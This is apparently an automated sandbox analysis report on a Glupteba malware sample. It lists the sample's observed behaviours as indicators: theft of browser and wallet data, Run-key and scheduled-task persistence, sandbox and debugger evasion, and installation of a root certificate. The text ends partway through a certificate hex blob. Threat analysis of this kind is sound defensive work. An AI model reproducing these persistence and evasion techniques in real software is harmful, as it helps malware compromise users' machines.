glupteba | 43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42

System Information Discovery

Processes:

SPZ5yRkjqXYPisANHlNQrwi1.exe43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exeFile.exeXuWcMgieroS1v7hySTYG0dJv.exexdfNFkzClTc7L7WIyHuWo_Li.exe0UDROfhv4cthEFENxAfzwY1O.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	SPZ5yRkjqXYPisANHlNQrwi1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	XuWcMgieroS1v7hySTYG0dJv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	xdfNFkzClTc7L7WIyHuWo_Li.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	0UDROfhv4cthEFENxAfzwY1O.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Graphics.exe7LHK9.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WispyShadow = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	7LHK9.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

133 api.db-ip.com
223 ipinfo.io
228 api.db-ip.com
128 ipinfo.io
132 api.db-ip.com
284 ipinfo.io
286 api.db-ip.com
13 ip-api.com
129 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
133	api.db-ip.com
223	ipinfo.io
228	api.db-ip.com
128	ipinfo.io
132	api.db-ip.com
284	ipinfo.io
286	api.db-ip.com
13	ip-api.com
129	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

6KKo6k1apCeYUITcuYGhtDbH.exeCVz9dul4nsYUrZoXcsOyvEGs.exeTlyUP3dq6PRVTzWqSiImv67D.exeWerFault.exe3GH57.exe3GH57.exeK7H1J.exe7LHK9.exe

pid	process
4720	6KKo6k1apCeYUITcuYGhtDbH.exe
4016	CVz9dul4nsYUrZoXcsOyvEGs.exe
224	TlyUP3dq6PRVTzWqSiImv67D.exe
2384	WerFault.exe
1368	3GH57.exe
1156	3GH57.exe
3664	K7H1J.exe
2332	7LHK9.exe

Drops file in Program Files directory 2 IoCs

Processes:

xdfNFkzClTc7L7WIyHuWo_Li.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	xdfNFkzClTc7L7WIyHuWo_Li.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	xdfNFkzClTc7L7WIyHuWo_Li.exe

Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File created C:\Windows\rss\csrss.exe Graphics.exe
File opened for modification C:\Windows\rss Graphics.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File opened for modification	C:\Windows\rss	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1444	4464	WerFault.exe	Graphics.exe
2616	4464	WerFault.exe	Graphics.exe
2884	4464	WerFault.exe	Graphics.exe
3468	4464	WerFault.exe	Graphics.exe
3568	4464	WerFault.exe	Graphics.exe
3632	4464	WerFault.exe	Graphics.exe
1896	4464	WerFault.exe	Graphics.exe
1080	4464	WerFault.exe	Graphics.exe
556	4464	WerFault.exe	Graphics.exe
912	4464	WerFault.exe	Graphics.exe
4488	4464	WerFault.exe	Graphics.exe
4040	4464	WerFault.exe	Graphics.exe
4208	4464	WerFault.exe	Graphics.exe
5080	4464	WerFault.exe	Graphics.exe
2560	4464	WerFault.exe	Graphics.exe
4256	4464	WerFault.exe	Graphics.exe
224	4464	WerFault.exe	Graphics.exe
4964	4464	WerFault.exe	Graphics.exe
1900	4464	WerFault.exe	Graphics.exe
4236	4464	WerFault.exe	Graphics.exe
1608	4464	WerFault.exe	Graphics.exe
1572	1824	WerFault.exe	Graphics.exe
3128	1824	WerFault.exe	Graphics.exe
3656	1824	WerFault.exe	Graphics.exe
4732	1824	WerFault.exe	Graphics.exe
1532	1824	WerFault.exe	Graphics.exe
2204	1824	WerFault.exe	Graphics.exe
2080	1824	WerFault.exe	Graphics.exe
3988	1824	WerFault.exe	Graphics.exe
320	1824	WerFault.exe	Graphics.exe
1324	1824	WerFault.exe	Graphics.exe
2772	1824	WerFault.exe	Graphics.exe
3544	1824	WerFault.exe	Graphics.exe
1804	1824	WerFault.exe	Graphics.exe
2116	1824	WerFault.exe	Graphics.exe
5072	1824	WerFault.exe	Graphics.exe
3168	1824	WerFault.exe	Graphics.exe
4848	3356	WerFault.exe	csrss.exe
4752	3356	WerFault.exe	csrss.exe
4720	3356	WerFault.exe	csrss.exe
4760	3356	WerFault.exe	csrss.exe
208	3356	WerFault.exe	csrss.exe
3524	3356	WerFault.exe	csrss.exe
2332	3356	WerFault.exe	csrss.exe
3580	3356	WerFault.exe	csrss.exe
4924	3356	WerFault.exe	csrss.exe
1704	3356	WerFault.exe	csrss.exe
3784	3356	WerFault.exe	csrss.exe
4080	3356	WerFault.exe	csrss.exe
4052	3356	WerFault.exe	csrss.exe
4208	3356	WerFault.exe	csrss.exe
2684	3356	WerFault.exe	csrss.exe
1532	3356	WerFault.exe	csrss.exe
3544	3356	WerFault.exe	csrss.exe
2212	3356	WerFault.exe	csrss.exe
644	3356	WerFault.exe	csrss.exe
3472	3356	WerFault.exe	csrss.exe
2588	3356	WerFault.exe	csrss.exe
3012	3356	WerFault.exe	csrss.exe
2308	3356	WerFault.exe	csrss.exe
436	3356	WerFault.exe	csrss.exe
1624	3356	WerFault.exe	csrss.exe
3220	1200	WerFault.exe	sjMARMVRFbL9N8ESXNFFQ1Xy.exe
400	2500	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2752 schtasks.exe
1984 schtasks.exe
3140 schtasks.exe
5848 schtasks.exe

pid	process
2752	schtasks.exe
1984	schtasks.exe
3140	schtasks.exe
5848	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2332 taskkill.exe

pid	process
2332	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

L1210LHJ08H6320.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	L1210LHJ08H6320.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	L1210LHJ08H6320.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	L1210LHJ08H6320.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	L1210LHJ08H6320.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

xdfNFkzClTc7L7WIyHuWo_Li.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	xdfNFkzClTc7L7WIyHuWo_Li.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	xdfNFkzClTc7L7WIyHuWo_Li.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b300906035504